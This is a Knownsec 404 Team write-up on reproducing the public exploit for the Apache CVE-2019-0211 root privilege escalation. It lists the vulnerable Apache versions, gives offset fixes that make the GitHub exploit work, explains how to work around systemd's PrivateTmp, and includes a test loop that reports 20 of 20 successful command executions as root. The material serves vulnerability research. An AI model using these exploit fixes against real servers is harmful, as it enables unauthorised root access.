Author: Hcamael@Knownsec 404 Team
Chinese Version: https://paper.seebug.org/889/

In April, Apache root privilege escalation was revealed, and its exploitation scripts was released on GitHub. This paper mainly discusses the problems when recurring this vulnerability.

The recurring environment

# 系统, 跟系统关系不是很大,主要问题是能不能用包管理器安装对应版本的apache
$ lsb_release -a
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.1 LTS
Release:    18.04
Codename:   bionic
# Apache版本,复现的关键就在该版本
$ apache2 -v
Server version: Apache/2.4.29 (Ubuntu)
Server built:   2018-03-02T02:19:31
# php版本
$ php -v
PHP 7.2.15-0ubuntu0.18.04.2 (cli) (built: Mar 22 2019 17:05:14) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.2.15-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
  1. The specified version: # apt install apache2=2.4.29-1ubuntu4 apache2-bin=2.4.29-1ubuntu4 apache2-utils=2.4.29-1ubuntu4 apache2-data=2.4.29-1ubuntu4.
  2. Use apt to install PHP directly.
  3. The exp address: https://github.com/cfreal/exploits/blob/master/CVE-2019-0211-apache/cfreal-carpediem.php.
  4. Open the "ssl" module: a2enmod ssl.

The explanations of the need to open "ssl" module:

  1. Even if you don't open the "ssl" module, the vulnerability exists.
  2. Even if you don't open the "ssl" module, you can modify the Apache configuration and open other ports.
  3. If you only open port 80, you need to find another utilization chain. It is announced on GitHub that exp is invalid with only one port open.
  4. The relevant code can be seen in 1 and 2, as well as the macro definition of SAFE_ACCPET.
/* On some architectures it's safe to do unserialized accept()s in the single
 * Listen case.  But it's never safe to do it in the case where there's
 * multiple Listen statements.  Define SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 * when it's safe in the single Listen case.
 */
#ifdef SINGLE_LISTEN_UNSERIALIZED_ACCEPT
#define SAFE_ACCEPT(stmt) (ap_listeners->next ? (stmt) : APR_SUCCESS)
#else
#define SAFE_ACCEPT(stmt) (stmt)
#endif

Simply to say, the mutex is generated only when Apache opens multiple ports, and the exp posted on GitHub is exploited by apex.

Problems in recurring vulnerability

Having tried a lot of versions, no one can directly use the exp on GitHub. In the above versions, two problems are found to cause the utilization failure:

  1. Calculation problem in $all_buckets = $i - 0x10.
  2. Calculation problem in $bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2);.

In the first point, if you use GDB to debug the address that calculates the all_buckets, you will find that the value is true. However, after executing the apache2ctl graceful command, all_buckets generates a new value, but only 0x38000 from the previous one, and this problem can be easily solved:

$all_buckets = $i - 0x10 + 0x38000;

Change the second calculation directly as follows:

$bucket_index = $bucket_index_middle;

Problems when recurring vulnerability in Ubuntu:

My payload: curl http://localhost/cfreal-carpediem.php?cmd=id>/tmp/2323232".

It seems that it was executed successfully, but the "2323232" file was not found in the /tmp directory. The futher study suggests that systemd redirected the tmp directory in Apache. Execute $find /tmp -name "2323232" to find the file, but only the root user can access it. It’s very simple if you don't want systemd to redirect the tmp directory. Set it false like this: PrivateTmp=false. Restart it after change and test it again, you can write the file under the tmp directory.

$ cat /lib/systemd/system/apache2.service 
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
Environment=APACHE_STARTED_BY_SYSTEMD=true
ExecStart=/usr/sbin/apachectl start
ExecStop=/usr/sbin/apachectl stop
ExecReload=/usr/sbin/apachectl graceful
PrivateTmp=false
Restart=on-abort

[Install]
WantedBy=multi-user.target

About success rate

It’s said that it can’t be 100% successful in exp’s annotation, so I write a script to test.

root@vultr:~# cat check 
#!/bin/bash

SUCC=0
COUNT=0
for i in $(seq 1 20)
do
let COUNT+=1
/etc/init.d/apache2 stop
sleep 1
/etc/init.d/apache2 start
if [ -f "/tmp/1982347" ];then
    rm /tmp/1982347
fi
curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/1982347"

apache2ctl graceful

sleep 1

if [ -f "/tmp/1982347" ];then
    let SUCC+=1
fi

done

echo "COUNT: $COUNT"
echo "SUCCESS: $SUCC"

The results of testing for 20 times: no failures.

# ./check
......
COUNT: 20
SUCCESS: 20

Conclusion

Other versions have not been tested yet, but here are some suggestions.

  1. Check all_buckets address.

    After the exp is executed, the corresponding pid and all_buckets addresses will be output. You can use gdb attach to check whether the address is correct: p all_buckets.

    PS: Only when you install the dbg package, there is the all_buckets symbol: apt install apache2-dbg=2.4.29-1ubuntu4.

    If there is a problem, debug and check the process of searching for the all_buckets address in exp. If there is no problem, use “gdb attach” main process (the process with root privileges) to set a breakpoint at make_child, and then execute apache2ctl graceful. When gdb's flow jumps to the make_child function, output p all_buckets again. Compared with the value obtained by exp, there is no problem if it is the same.

  2. Check my_bucket address.

    The previous process is the same as above, focusing on the code assigned by my_bucket in the make_child function: 3.

    It should be noted that there is a fork above, so add set follow-fork-mode child in gdb.
    The value of my_bucket points to the address of the heap. If the value of my_bucket is no problem, exp is basically true. If not, adjust $bucket_index.

Update

The "debian 9" is tested successfully.

# cat /etc/issue
Debian GNU/Linux 9 \n \l
# apache2 -v
Server version: Apache/2.4.25 (Debian)
Server built:   2018-11-03T18:46:19
# php -v
PHP 7.0.33-0+deb9u3 (cli) (built: Mar  8 2019 10:01:24) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
    with Zend OPcache v7.0.33-0+deb9u3, Copyright (c) 1999-2017, by Zend Technologies

Reference

  1. https://github.com/apache/httpd/blob/23167945c17d5764820fdefdcab69295745a15a1/server/mpm/prefork/prefork.c#L433
  2. https://github.com/apache/httpd/blob/23167945c17d5764820fdefdcab69295745a15a1/server/mpm/prefork/prefork.c#L1223
  3. https://github.com/apache/httpd/blob/23167945c17d5764820fdefdcab69295745a15a1/server/mpm/prefork/prefork.c#L691

About Knownsec & 404 Team

Beijing Knownsec Information Technology Co., Ltd. was established by a group of high-profile international security experts. It has over a hundred frontier security talents nationwide as the core security research team to provide long-term internationally advanced network security solutions for the government and enterprises.

Knownsec's specialties include network attack and defense integrated technologies and product R&D under new situations. It provides visualization solutions that meet the world-class security technology standards and enhances the security monitoring, alarm and defense abilities of customer networks with its industry-leading capabilities in cloud computing and big data processing. The company's technical strength is strongly recognized by the State Ministry of Public Security, the Central Government Procurement Center, the Ministry of Industry and Information Technology (MIIT), China National Vulnerability Database of Information Security (CNNVD), the Central Bank, the Hong Kong Jockey Club, Microsoft, Zhejiang Satellite TV and other well-known clients.

404 Team, the core security team of Knownsec, is dedicated to the research of security vulnerability and offensive and defensive technology in the fields of Web, IoT, industrial control, blockchain, etc. 404 team has submitted vulnerability research to many well-known vendors such as Microsoft, Apple, Adobe, Tencent, Alibaba, Baidu, etc. And has received a high reputation in the industry.

The most well-known sharing of Knownsec 404 Team includes: KCon Hacking Conference, Seebug Vulnerability Database and ZoomEye Cyberspace Search Engine.


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/928/